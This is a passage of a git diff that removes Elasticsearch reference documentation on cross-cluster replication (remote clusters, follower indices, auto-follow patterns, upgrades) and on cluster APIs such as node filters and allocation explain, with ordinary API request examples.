- "persistent" : { - "cluster" : { - "remote" : { - "leader" : { - "seeds" : [ - "127.0.0.1:9300" <1> - ] - } - } - } - } -} --------------------------------------------------- -// TEST[setup:host] -// TEST[s/127.0.0.1:9300/\${transport_host}/] -<1> Specifies the hostname and transport port of a seed node in the remote - cluster. - -You can verify that the local cluster is successfully connected to the remote -cluster. - -[source,console] --------------------------------------------------- -GET /_remote/info --------------------------------------------------- -// TEST[continued] - -The API will respond by showing that the local cluster is connected to the -remote cluster. - -[source,console-result] --------------------------------------------------- -{ - "leader" : { - "seeds" : [ - "127.0.0.1:9300" - ], - "connected" : true, <1> - "num_nodes_connected" : 1, <2> - "max_connections_per_cluster" : 3, - "initial_connect_timeout" : "30s", - "skip_unavailable" : false, - "mode" : "sniff" - } -} --------------------------------------------------- -// TESTRESPONSE[s/127.0.0.1:9300/$body.leader.seeds.0/] -// TEST[s/"connected" : true/"connected" : $body.leader.connected/] -// TEST[s/"num_nodes_connected" : 1/"num_nodes_connected" : $body.leader.num_nodes_connected/] -<1> This shows the local cluster is connected to the remote cluster with cluster - alias `leader` -<2> This shows the number of nodes in the remote cluster the local cluster is - connected to. -==== - -[[ccr-enable-soft-deletes]] -==== Enable soft deletes on leader indices -To follow an index, it must have been created with -<> enabled. If the index doesn’t have -soft deletes enabled, you must reindex it and use the new index as the leader -index. Soft deletes are enabled by default on new indices -created with {es} 7.0.0 and later. - -[[ccr-getting-started-follower-index]] -==== Create a follower index to replicate a specific index -When you create a follower index, you reference the remote cluster and the -leader index in your remote cluster. - -To create a follower index from Stack Management in {kib}: - -. Select *Cross-Cluster Replication* in the side navigation and choose the -*Follower Indices* tab. -. Choose the cluster (ClusterA) containing the leader index you want to -replicate. -. Enter the name of the leader index, which is -`kibana_sample_data_ecommerce` if you are following the tutorial. -. Enter a name for your follower index, such as `follower-kibana-sample-data`. - -image::images/ccr-add-follower-index.png["Adding a follower index named server-metrics in {kib}"] - -{es} initializes the follower using the -<> -process, which transfers the existing Lucene segment files from the leader -index to the follower index. The index status changes to *Paused*. When the -remote recovery process is complete, the index following begins and the status -changes to *Active*. - -When you index documents into your leader index, {es} replicates the documents -in the follower index. - -[role="screenshot"] -image::images/ccr-follower-index.png["The Cross-Cluster Replication page in {kib}"] - -[%collapsible] -.API example -==== -Use the <> to create follower indices. -When you create a follower index, you must reference the remote cluster and the -leader index that you created in the -remote cluster. - -When initiating the follower request, the response returns before the -<> process completes. To wait for the process -to complete, add the `wait_for_active_shards` parameter to your request. - -[source,console] --------------------------------------------------- -PUT /server-metrics-follower/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "leader", - "leader_index" : "server-metrics" -} --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[source,console-result] --------------------------------------------------- -{ - "follow_index_created" : true, - "follow_index_shards_acked" : true, - "index_following_started" : true -} --------------------------------------------------- - -////////////////////////// - -Use the -<> to inspect the status of -replication - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /server-metrics-follower/_ccr/pause_follow - -POST /server-metrics-follower/_close - -POST /server-metrics-follower/_ccr/unfollow --------------------------------------------------- -// TEST[continued] - -////////////////////////// -==== - -[[ccr-getting-started-auto-follow]] -==== Create an auto-follow pattern to replicate time series indices -You use <> to automatically create new -followers for rolling time series indices. Whenever the name of a new index on -the remote cluster matches the auto-follow pattern, a corresponding follower -index is added to the local cluster. - -An auto-follow pattern specifies the remote cluster you want to replicate from, -and one or more index patterns that specify the rolling time series indices you -want to replicate. - -// tag::ccr-create-auto-follow-pattern-tag[] -To create an auto-follow pattern from Stack Management in {kib}: - -. Select *Cross Cluster Replication* in the side navigation and choose the -*Auto-follow patterns* tab. -. Enter a name for the auto-follow pattern, such as `beats`. -. Choose the remote cluster that contains the index you want to replicate, -which in the example scenario is Cluster A. -. Enter one or more index patterns that identify the indices you want to -replicate from the remote cluster. For example, enter -`metricbeat-* packetbeat-*` to automatically create followers for {metricbeat} and {packetbeat} indices. -. Enter *follower-* as the prefix to apply to the names of the follower indices so -you can more easily identify replicated indices. - -As new indices matching these patterns are -created on the remote, {es} automatically replicates them to local follower indices. - -[role="screenshot"] -image::images/auto-follow-patterns.png["The Auto-follow patterns page in {kib}"] - -// end::ccr-create-auto-follow-pattern-tag[] - -[%collapsible] -.API example -==== -Use the <> to -configure auto-follow patterns. - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/beats -{ - "remote_cluster" : "leader", - "leader_index_patterns" : - [ - "metricbeat-*", <1> - "packetbeat-*" <2> - ], - "follow_index_pattern" : "{{leader_index}}-copy" <3> -} --------------------------------------------------- -// TEST[continued] -<1> Automatically follow new {metricbeat} indices. -<2> Automatically follow new {packetbeat} indices. -<3> The name of the follower index is derived from the name of the leader index - by adding the suffix `-copy` to the name of the leader index. - -////////////////////////// - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- - -////////////////////////// - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/beats --------------------------------------------------- -// TEST[continued] - -////////////////////////// -==== diff --git a/docs/reference/ccr/images/auto-follow-patterns.jpg b/docs/reference/ccr/images/auto-follow-patterns.jpg deleted file mode 100644 index bc32d8fadfa..00000000000 Binary files a/docs/reference/ccr/images/auto-follow-patterns.jpg and /dev/null differ diff --git a/docs/reference/ccr/images/auto-follow-patterns.png b/docs/reference/ccr/images/auto-follow-patterns.png deleted file mode 100644 index 69e1cc8641b..00000000000 Binary files a/docs/reference/ccr/images/auto-follow-patterns.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-add-follower-index.png b/docs/reference/ccr/images/ccr-add-follower-index.png deleted file mode 100644 index c61ff967769..00000000000 Binary files a/docs/reference/ccr/images/ccr-add-follower-index.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-add-remote-cluster.png b/docs/reference/ccr/images/ccr-add-remote-cluster.png deleted file mode 100644 index c781b86df44..00000000000 Binary files a/docs/reference/ccr/images/ccr-add-remote-cluster.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-bi-directional.png b/docs/reference/ccr/images/ccr-arch-bi-directional.png deleted file mode 100644 index 9c936cd9f4b..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-bi-directional.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-central-reporting.png b/docs/reference/ccr/images/ccr-arch-central-reporting.png deleted file mode 100644 index 55f50af5604..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-central-reporting.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-chain-dcs.png b/docs/reference/ccr/images/ccr-arch-chain-dcs.png deleted file mode 100644 index 042a8185c75..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-chain-dcs.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-data-locality.png b/docs/reference/ccr/images/ccr-arch-data-locality.png deleted file mode 100644 index a2b67b07284..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-data-locality.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-disaster-recovery.png b/docs/reference/ccr/images/ccr-arch-disaster-recovery.png deleted file mode 100644 index 244c71910ff..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-disaster-recovery.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-multiple-dcs.png b/docs/reference/ccr/images/ccr-arch-multiple-dcs.png deleted file mode 100644 index 2a2fd05a007..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-multiple-dcs.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-follower-index.png b/docs/reference/ccr/images/ccr-follower-index.png deleted file mode 100644 index dee64c5272c..00000000000 Binary files a/docs/reference/ccr/images/ccr-follower-index.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-tutorial-clusters.png b/docs/reference/ccr/images/ccr-tutorial-clusters.png deleted file mode 100644 index ef1fff4dc13..00000000000 Binary files a/docs/reference/ccr/images/ccr-tutorial-clusters.png and /dev/null differ diff --git a/docs/reference/ccr/images/remote-clusters.jpg b/docs/reference/ccr/images/remote-clusters.jpg deleted file mode 100644 index a843320c231..00000000000 Binary files a/docs/reference/ccr/images/remote-clusters.jpg and /dev/null differ diff --git a/docs/reference/ccr/index.asciidoc b/docs/reference/ccr/index.asciidoc deleted file mode 100644 index 5adf860e9d0..00000000000 --- a/docs/reference/ccr/index.asciidoc +++ /dev/null @@ -1,302 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[xpack-ccr]] -== {ccr-cap} -With {ccr}, you can replicate indices across clusters to: - -* Continue handling search requests in the event of a datacenter outage -* Prevent search volume from impacting indexing throughput -* Reduce search latency by processing search requests in geo-proximity to the -user - -{ccr-cap} uses an active-passive model. You index to a _leader_ index, and the -data is replicated to one or more read-only _follower_ indices. Before you can add a follower index to a cluster, you must configure the _remote cluster_ that contains the leader index. - -When the leader index receives writes, the follower indices pull changes from -the leader index on the remote cluster. You can manually create follower -indices, or configure auto-follow patterns to automatically create follower -indices for new time series indices. - -You configure {ccr} clusters in a uni-directional or bi-directional setup: - -* In a uni-directional configuration, one cluster contains only -leader indices, and the other cluster contains only follower indices. -* In a bi-directional configuration, each cluster contains both leader and -follower indices. - -In a uni-directional configuration, the cluster containing follower indices -must be running **the same or newer** version of {es} as the remote cluster. -If newer, the versions must also be compatible as outlined in the following matrix. - -[%collapsible] -[[ccr-version-compatibility]] -.Version compatibility matrix -==== -include::../modules/remote-clusters.asciidoc[tag=remote-cluster-compatibility-matrix] -==== - -[discrete] -[[ccr-multi-cluster-architectures]] -=== Multi-cluster architectures -Use {ccr} to construct several multi-cluster architectures within the Elastic -Stack: - -* <> in case a primary cluster fails, -with a secondary cluster serving as a hot backup -* <> to maintain multiple copies of the -dataset close to the application servers (and users), and reduce costly latency -* <> for minimizing network -traffic and latency in querying multiple geo-distributed {es} clusters, or for -preventing search load from interfering with indexing by offloading search to a -secondary cluster - -Watch the -https://www.elastic.co/webinars/replicate-elasticsearch-data-with-cross-cluster-replication-ccr[{ccr} webinar] to learn more about the following use cases. -Then, <> on your local machine and work -through the demo from the webinar. - -[discrete] -[[ccr-disaster-recovery]] -==== Disaster recovery and high availability -Disaster recovery provides your mission-critical applications with the -tolerance to withstand datacenter or region outages. This use case is the -most common deployment of {ccr}. You can configure clusters in different -architectures to support disaster recovery and high availability: - -* <> -* <> -* <> -* <> - -[discrete] -[[ccr-single-datacenter-recovery]] -===== Single disaster recovery datacenter -In this configuration, data is replicated from the production datacenter to the -disaster recovery datacenter. Because the follower indices replicate the leader -index, your application can use the disaster recovery datacenter if the -production datacenter is unavailable. - -image::images/ccr-arch-disaster-recovery.png[Production datacenter that replicates data to a disaster recovery datacenter] - -[discrete] -[[ccr-multiple-datacenter-recovery]] -===== Multiple disaster recovery datacenters -You can replicate data from one datacenter to multiple datacenters. This -configuration provides both disaster recovery and high availability, ensuring -that data is replicated in two datacenters if the primary datacenter is down -or unavailable. - -In the following diagram, data from Datacenter A is replicated to -Datacenter B and Datacenter C, which both have a read-only copy of the leader -index from Datacenter A. - -image::images/ccr-arch-multiple-dcs.png[Production datacenter that replicates data to two other datacenters] - -[discrete] -[[ccr-chained-replication]] -===== Chained replication -You can replicate data across multiple datacenters to form a replication -chain. In the following diagram, Datacenter A contains the leader index. -Datacenter B replicates data from Datacenter A, and Datacenter C replicates -from the follower indices in Datacenter B. The connection between these -datacenters forms a chained replication pattern. - -image::images/ccr-arch-chain-dcs.png[Three datacenters connected to form a replication chain] - -[discrete] -[[ccr-bi-directional-replication]] -===== Bi-directional replication -In a https://www.elastic.co/blog/bi-directional-replication-with-elasticsearch-cross-cluster-replication-ccr[bi-directional replication] setup, all clusters have access to view -all data, and all clusters have an index to write to without manually -implementing failover. Applications can write to the local index within each -datacenter, and read across multiple indices for a global view of all -information. - -This configuration requires no manual intervention when a cluster or datacenter -is unavailable. In the following diagram, if Datacenter A is unavailable, you can continue using Datacenter B without manual failover. When Datacenter A -comes online, replication resumes between the clusters. - -image::images/ccr-arch-bi-directional.png[Bi-directional configuration where each cluster contains both a leader index and follower indices] - -NOTE: This configuration is useful for index-only workloads, where no updates -to document values occur. In this configuration, documents indexed by {es} are -immutable. Clients are located in each datacenter alongside the {es} -cluster, and do not communicate with clusters in different datacenters. - -[discrete] -[[ccr-data-locality]] -==== Data locality -Bringing data closer to your users or application server can reduce latency -and response time. This methodology also applies when replicating data in {es}. -For example, you can replicate a product catalog or reference dataset to 20 or -more datacenters around the world to minimize the distance between the data and -the application server. - -In the following diagram, data is replicated from one datacenter to three -additional datacenters, each in their own region. The central datacenter -contains the leader index, and the additional datacenters contain follower -indices that replicate data in that particular region. This configuration -puts data closer to the application accessing it. - -image::images/ccr-arch-data-locality.png[A centralized datacenter replicated across three other datacenters, each in their own region] - -[discrete] -[[ccr-centralized-reporting]] -==== Centralized reporting -Using a centralized reporting cluster is useful when querying across a large -network is inefficient. In this configuration, you replicate data from many -smaller clusters to the centralized reporting cluster. - -For example, a large global bank might have 100 {es} clusters around the world -that are distributed across different regions for each bank branch. Using -{ccr}, the bank can replicate events from all 100 banks to a central cluster to -analyze and aggregate events locally for reporting. Rather than maintaining a -mirrored cluster, the bank can use {ccr} to replicate specific indices. - -In the following diagram, data from three datacenters in different regions is -replicated to a centralized reporting cluster. This configuration enables you -to copy data from regional hubs to a central cluster, where you can run all -reports locally. - -image::images/ccr-arch-central-reporting.png[Three clusters in different regions sending data to a centralized reporting cluster for analysis] - -[discrete] -[[ccr-replication-mechanics]] -=== Replication mechanics -Although you <> at the index level, {es} -achieves replication at the shard level. When a follower index is created, -each shard in that index pulls changes from its corresponding shard in the -leader index, which means that a follower index has the same number of -shards as its leader index. All operations on the leader are replicated by the -follower, such as operations to create, update, or delete a document. -These requests can be served from any copy of the leader shard (primary or -replica). - -When a follower shard sends a read request, the leader shard responds with -any new operations, limited by the read parameters that you establish when -configuring the follower index. If no new operations are available, the -leader shard waits up to the configured timeout for new operations. If the -timeout elapses, the leader shard responds to the follower shard that there -are no new operations. The follower shard updates shard statistics and -immediately sends another read request to the leader shard. This -communication model ensures that network connections between the remote -cluster and the local cluster are continually in use, avoiding forceful -termination by an external source such as a firewall. - -If a read request fails, the cause of the failure is inspected. If the -cause of the failure is deemed to be recoverable (such as a network -failure), the follower shard enters into a retry loop. Otherwise, the -follower shard pauses -<>. - -When a follower shard receives operations from the leader shard, it places -those operations in a write buffer. The follower shard submits bulk write -requests using operations from the write buffer. If the write buffer exceeds -its configured limits, no additional read requests are sent. This configuration -provides a back-pressure against read requests, allowing the follower shard -to resume sending read requests when the write buffer is no longer full. - -To manage how operations are replicated from the leader index, you can -configure settings when -<>. - -The follower index automatically retrieves some updates applied to the leader -index, while other updates are retrieved as needed: - -[cols="3"] -|=== -h| Update type h| Automatic h| As needed -| Alias | {yes-icon} | {no-icon} -| Mapping | {no-icon} | {yes-icon} -| Settings | {no-icon} | {yes-icon} -|=== - -For example, changing the number of replicas on the leader index is not -replicated by the follower index, so that setting might not be retrieved. - -NOTE: You cannot manually modify a follower index's mappings or aliases. - -If you apply a non-dynamic settings change to the leader index that is -needed by the follower index, the follower index closes itself, applies the -settings update, and then re-opens itself. The follower index is unavailable -for reads and cannot replicate writes during this cycle. - -[discrete] -[[ccr-remote-recovery]] -=== Initializing followers using remote recovery -When you create a follower index, you cannot use it until it is fully -initialized. The _remote recovery_ process builds a new copy of a shard on a -follower node by copying data from the primary shard in the leader cluster. - -{es} uses this remote recovery process to bootstrap a follower index using the -data from the leader index. This process provides the follower with a copy of -the current state of the leader index, even if a complete history of changes -is not available on the leader due to Lucene segment merging. - -Remote recovery is a network intensive process that transfers all of the Lucene -segment files from the leader cluster to the follower cluster. The follower -requests that a recovery session be initiated on the primary shard in the -leader cluster. The follower then requests file chunks concurrently from the -leader. By default, the process concurrently requests five 1MB file -chunks. This default behavior is designed to support leader and follower -clusters with high network latency between them. - -TIP: You can modify dynamic <> -to rate-limit the transmitted data and manage the resources consumed by remote -recoveries. - -Use the <> on the cluster containing the follower -index to obtain information about an in-progress remote recovery. Because {es} -implements remote recoveries using the -<> infrastructure, running remote -recoveries are labelled as type `snapshot` in the recovery API. - -[discrete] -[[ccr-leader-requirements]] -=== Replicating a leader requires soft deletes -{ccr-cap} works by replaying the history of individual write -operations that were performed on the shards of the leader index. {es} needs to -retain the -<> on the leader -shards so that they can be pulled by the follower shard tasks. The underlying -mechanism used to retain these operations is _soft deletes_. - -A soft delete occurs whenever an existing document is deleted or updated. By -retaining these soft deletes up to configurable limits, the history of -operations can be retained on the leader shards and made available to the -follower shard tasks as it replays the history of operations. - -The <> setting defines the -maximum time to retain a shard history retention lease before it is -considered expired. This setting determines how long the cluster containing -your leader index can be offline, which is 12 hours by default. If a shard copy -recovers after its retention lease expires, then {es} will fall back to copying -the entire index, because it can no longer replay the missing history. - -Soft deletes must be enabled for indices that you want to use as leader -indices. Soft deletes are enabled by default on new indices created on -or after {es} 7.0.0. - -// tag::ccr-existing-indices-tag[] -IMPORTANT: {ccr-cap} cannot be used on existing indices created using {es} -7.0.0 or earlier, where soft deletes are disabled. You must -<> your data into a new index with soft deletes -enabled. - -// end::ccr-existing-indices-tag[] - -[discrete] -[[ccr-learn-more]] -=== Use {ccr} -This following sections provide more information about how to configure -and use {ccr}: - -* <> -* <> -* <> -* <> - -include::getting-started.asciidoc[] -include::managing.asciidoc[] -include::auto-follow.asciidoc[] -include::upgrading.asciidoc[] diff --git a/docs/reference/ccr/managing.asciidoc b/docs/reference/ccr/managing.asciidoc deleted file mode 100644 index bb07375a172..00000000000 --- a/docs/reference/ccr/managing.asciidoc +++ /dev/null @@ -1,164 +0,0 @@ -[role="xpack"] -[testenv="platinum"] - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[[ccr-managing]] -=== Manage {ccr} -Use the following information to manage {ccr} tasks, such as inspecting -replication progress, pausing and resuming replication, recreating a follower -index, and terminating replication. - -[[ccr-access-ccr]] -To start using {ccr}, access {kib} and go to -*Management > Stack Management*. In the side navigation, select -*Cross-Cluster Replication*. - -[[ccr-inspect-progress]] -==== Inspect replication statistics -To inspect the progress of replication for a follower index and view -detailed shard statistics, <> and choose the *Follower indices* tab. - -Select the name of the follower index you want to view replication details -for. The slide-out panel shows settings and replication statistics for the -follower index, including read and write operations that are managed by the -follower shard. - -To view more detailed statistics, click *View in Index Management*, and -then select the name of the follower index in Index Management. -Open the tabs for detailed statistics about the follower index. - -[%collapsible] -.API example -==== -Use the <> to inspect replication -progress at the shard level. This API provides insight into the read and writes -managed by the follower shard. The API also reports read exceptions that can be -retried and fatal exceptions that require user intervention. -==== - -[[ccr-pause-replication]] -==== Pause and resume replication -To pause and resume replication of the leader index, <> and choose the *Follower indices* tab. - -Select the follower index you want to pause and choose *Manage > Pause Replication*. The follower index status changes to Paused. - -To resume replication, select the follower index and choose -*Resume replication*. - -[%collapsible] -.API example -==== -You can pause replication with the -<> and then later resume -replication with the <>. -Using these APIs in tandem enables you to adjust the read and write parameters -on the follower shard task if your initial configuration is not suitable for -your use case. -==== - -[[ccr-recreate-follower-index]] -==== Recreate a follower index -When a document is updated or deleted, the underlying operation is retained in -the Lucene index for a period of time defined by the -<> parameter. You configure -this setting on the <>. - -When a follower index starts, it acquires a retention lease from -the leader index. This lease informs the leader that it should not allow a soft -delete to be pruned until either the follower indicates that it has received -the operation, or until the lease expires. - -If a follower index falls sufficiently behind a leader and cannot -replicate operations, {es} reports an `indices[].fatal_exception` error. To -resolve the issue, recreate the follower index. When the new follow index -starts, the <> process recopies the -Lucene segment files from the leader. - -IMPORTANT: Recreating the follower index is a destructive action. All existing -Lucene segment files are deleted on the cluster containing the follower index. - -To recreate a follower index, -<> and choose the -*Follower indices* tab. - -[role="screenshot"] -image::images/ccr-follower-index.png["The Cross-Cluster Replication page in {kib}"] - -Select the follower index and pause replication. When the follower index status -changes to Paused, reselect the follower index and choose to unfollow the -leader index. - -The follower index will be converted to a standard index and will no longer -display on the Cross-Cluster Replication page. - -In the side navigation, choose *Index Management*. Select the follower index -from the previous steps and close the follower index. - -You can then <> -to restart the replication process. - -[%collapsible] -.Use the API -==== -Use the <> to pause the replication -process. Then, close the follower index and recreate it. For example: - -[source,console] ----------------------------------------------------------------------- -POST /follower_index/_ccr/pause_follow - -POST /follower_index/_close - -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} ----------------------------------------------------------------------- -==== - -[[ccr-terminate-replication]] -==== Terminate replication -You can unfollow a leader index to terminate replication and convert the -follower index to a standard index. - -<> and choose the -*Follower indices* tab. - -Select the follower index and pause replication. When the follower index status -changes to Paused, reselect the follower index and choose to unfollow the -leader index. - -The follower index will be converted to a standard index and will no longer -display on the Cross-Cluster Replication page. - -You can then choose *Index Management*, select the follower index -from the previous steps, and close the follower index. - -[%collapsible] -.Use the API -==== -You can terminate replication with the -<>. This API converts a follower index -to a standard (non-follower) index. -==== diff --git a/docs/reference/ccr/upgrading.asciidoc b/docs/reference/ccr/upgrading.asciidoc deleted file mode 100644 index e7cf6249d5e..00000000000 --- a/docs/reference/ccr/upgrading.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-upgrading]] -=== Upgrading clusters using {ccr} -++++ -Upgrading clusters -++++ - -Clusters that are actively using {ccr} require a careful approach to upgrades. -The following conditions could cause index following to fail during rolling -upgrades: - -* Clusters that have not yet been upgraded will reject new index settings or -mapping types that are replicated from an upgraded cluster. -* Nodes in a cluster that has not been upgraded will reject index files from a -node in an upgraded cluster when index following tries to fall back to -file-based recovery. This limitation is due to Lucene not being forward -compatible. - -The approach to running a rolling upgrade on clusters where {ccr} is -enabled differs based on uni-directional and bi-directional index following. - -[[ccr-uni-directional-upgrade]] -==== Uni-directional index following -In a uni-directional configuration, one cluster contains only -leader indices, and the other cluster contains only follower indices that -replicate the leader indices. - -In this strategy, the cluster with follower indices should be upgraded -first and the cluster with leader indices should be upgraded last. -Upgrading the clusters in this order ensures that index following can continue -during the upgrade without downtime. - -You can also use this strategy to upgrade a -<>. Start by upgrading clusters at -the end of the chain and working your way back to the cluster that contains the -leader indices. - -For example, consider a configuration where Cluster A contains all leader -indices. Cluster B follows indices in Cluster A, and Cluster C follows indices -in Cluster B. - --- - Cluster A - ^--Cluster B - ^--Cluster C --- - -In this configuration, upgrade the clusters in the following order: - -. Cluster C -. Cluster B -. Cluster A - -[[ccr-bi-directional-upgrade]] -==== Bi-directional index following - -In a bi-directional configuration, each cluster contains both leader and -follower indices. - -When upgrading clusters in this configuration, -<> and -<> prior to -upgrading both clusters. - -After upgrading both clusters, resume index following and resume replication -of auto-follow patterns. diff --git a/docs/reference/cluster.asciidoc b/docs/reference/cluster.asciidoc deleted file mode 100644 index 1c406f0bc18..00000000000 --- a/docs/reference/cluster.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[[cluster]] -== Cluster APIs - -["float",id="cluster-nodes"] -=== Node specification - -Some cluster-level APIs may operate on a subset of the nodes which can be -specified with _node filters_. For example, the <>, -<>, and <> APIs -can all report results from a filtered set of nodes rather than from all nodes. - -_Node filters_ are written as a comma-separated list of individual filters, -each of which adds or removes nodes from the chosen subset. Each filter can be -one of the following: - -* `_all`, to add all nodes to the subset. -* `_local`, to add the local node to the subset. -* `_master`, to add the currently-elected master node to the subset. -* a node id or name, to add this node to the subset. -* an IP address or hostname, to add all matching nodes to the subset. -* a pattern, using `*` wildcards, which adds all nodes to the subset - whose name, address or hostname matches the pattern. -* `master:true`, `data:true`, `ingest:true`, `voting_only:true`, `ml:true`, or - `coordinating_only:true`, which respectively add to the subset all - master-eligible nodes, all data nodes, all ingest nodes, all voting-only - nodes, all machine learning nodes, and all coordinating-only nodes. -* `master:false`, `data:false`, `ingest:false`, `voting_only:true`, `ml:false`, - or `coordinating_only:false`, which respectively remove from the subset all - master-eligible nodes, all data nodes, all ingest nodes, all voting-only - nodes, all machine learning nodes, and all coordinating-only nodes. -* a pair of patterns, using `*` wildcards, of the form `attrname:attrvalue`, - which adds to the subset all nodes with a custom node attribute whose name - and value match the respective patterns. Custom node attributes are - configured by setting properties in the configuration file of the form - `node.attr.attrname: attrvalue`. - -NOTE: node filters run in the order in which they are given, which is important -if using filters that remove nodes from the set. For example -`_all,master:false` means all the nodes except the master-eligible ones, but -`master:false,_all` means the same as `_all` because the `_all` filter runs -after the `master:false` filter. - -NOTE: if no filters are given, the default is to select all nodes. However, if -any filters are given then they run starting with an empty chosen subset. This -means that filters such as `master:false` which remove nodes from the chosen -subset are only useful if they come after some other filters. When used on its -own, `master:false` selects no nodes. - -NOTE: The `voting_only` role requires the {default-dist} of Elasticsearch and -is not supported in the {oss-dist}. - -Here are some examples of the use of node filters with the -<> APIs. - -[source,console] --------------------------------------------------- -# If no filters are given, the default is to select all nodes -GET /_nodes -# Explicitly select all nodes -GET /_nodes/_all -# Select just the local node -GET /_nodes/_local -# Select the elected master node -GET /_nodes/_master -# Select nodes by name, which can include wildcards -GET /_nodes/node_name_goes_here -GET /_nodes/node_name_goes_* -# Select nodes by address, which can include wildcards -GET /_nodes/10.0.0.3,10.0.0.4 -GET /_nodes/10.0.0.* -# Select nodes by role -GET /_nodes/_all,master:false -GET /_nodes/data:true,ingest:true -GET /_nodes/coordinating_only:true -GET /_nodes/master:true,voting_only:false -# Select nodes by custom attribute (e.g. with something like `node.attr.rack: 2` in the configuration file) -GET /_nodes/rack:2 -GET /_nodes/ra*:2 -GET /_nodes/ra*:2* --------------------------------------------------- - -include::cluster/allocation-explain.asciidoc[] - -include::cluster/get-settings.asciidoc[] - -include::cluster/health.asciidoc[] - -include::cluster/reroute.asciidoc[] - -include::cluster/state.asciidoc[] - -include::cluster/stats.asciidoc[] - -include::cluster/update-settings.asciidoc[] - -include::cluster/nodes-usage.asciidoc[] - -include::cluster/nodes-hot-threads.asciidoc[] - -include::cluster/nodes-info.asciidoc[] - -include::cluster/nodes-reload-secure-settings.asciidoc[] - -include::cluster/nodes-stats.asciidoc[] - -include::cluster/pending.asciidoc[] - -include::cluster/remote-info.asciidoc[] - -include::cluster/tasks.asciidoc[] - -include::cluster/voting-exclusions.asciidoc[] diff --git a/docs/reference/cluster/allocation-explain.asciidoc b/docs/reference/cluster/allocation-explain.asciidoc deleted file mode 100644 index 2bbe7e01b9b..00000000000 --- a/docs/reference/cluster/allocation-explain.asciidoc +++ /dev/null @@ -1,351 +0,0 @@ -[[cluster-allocation-explain]] -=== Cluster allocation explain API -++++ -Cluster allocation explain -++++ - -Provides explanations for shard allocations in the cluster. - - -[[cluster-allocation-explain-api-request]] -==== {api-request-title} - -`GET /_cluster/allocation/explain` - -[[cluster-allocation-explain-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-allocation-explain-api-desc]] -==== {api-description-title} - -The purpose of the cluster allocation explain API is to provide -explanations for shard allocations in the cluster. For unassigned shards, -the explain API provides an explanation for why the shard is unassigned. -For assigned shards, the explain API provides an explanation for why the -shard is remaining on its current node and has not moved or rebalanced to -another node. This API can be very useful when attempting to diagnose why a -shard is unassigned or why a shard continues to remain on its current node when -you might expect otherwise. - - -[[cluster-allocation-explain-api-query-params]] -==== {api-query-parms-title} - -`include_disk_info`:: - (Optional, Boolean) If `true`, returns information about disk usage and - shard sizes. Defaults to `false`. - -`include_yes_decisions`:: - (Optional, Boolean) If `true`, returns 'YES' decisions in explanation. - Defaults to `false`. - - -[[cluster-allocation-explain-api-request-body]] -==== {api-request-body-title} - -`current_node`:: - (Optional, string) Specifies the node ID or the name of the node to only - explain a shard that is currently located on the specified node. - -`index`:: - (Optional, string) Specifies the name of the index that you would like an - explanation for. - -`primary`:: - (Optional, Boolean) If `true`, returns explanation for the primary shard - for the given shard ID. - -`shard`:: - (Optional, integer) Specifies the ID of the shard that you would like an - explanation for. - -You can also have {es} explain the allocation of the first unassigned shard that -it finds by sending an empty body for the request. - - -[[cluster-allocation-explain-api-examples]] -==== {api-examples-title} - - -////// -[source,console] --------------------------------------------------- -PUT /my-index-000001 --------------------------------------------------- -// TESTSETUP -////// - -[source,console] --------------------------------------------------- -GET /_cluster/allocation/explain -{ - "index": "my-index-000001", - "shard": 0, - "primary": true -} --------------------------------------------------- - - -===== Example of the current_node parameter - -[source,console] --------------------------------------------------- -GET /_cluster/allocation/explain -{ - "index": "my-index-000001", - "shard": 0, - "primary": false, - "current_node": "nodeA" <1> -} --------------------------------------------------- -// TEST[skip:no way of knowing the current_node] - -<1> The node where shard 0 currently has a replica on - - -===== Examples of unassigned primary shard explanations - -////// -[source,console] --------------------------------------------------- -DELETE my-index-000001 --------------------------------------------------- -////// - -[source,console] --------------------------------------------------- -PUT /my-index-000001?master_timeout=1s&timeout=1s -{ - "settings": { - "index.routing.allocation.include._name": "non_existent_node", - "index.routing.allocation.include._tier_preference": null - } -} - -GET /_cluster/allocation/explain -{ - "index": "my-index-000001", - "shard": 0, - "primary": true -} --------------------------------------------------- -// TEST[continued] - - -The API returns the following response for an unassigned primary shard: - -[source,console-result] --------------------------------------------------- -{ - "index" : "my-index-000001", - "shard" : 0, - "primary" : true, - "current_state" : "unassigned", <1> - "unassigned_info" : { - "reason" : "INDEX_CREATED", <2> - "at" : "2017-01-04T18:08:16.600Z", - 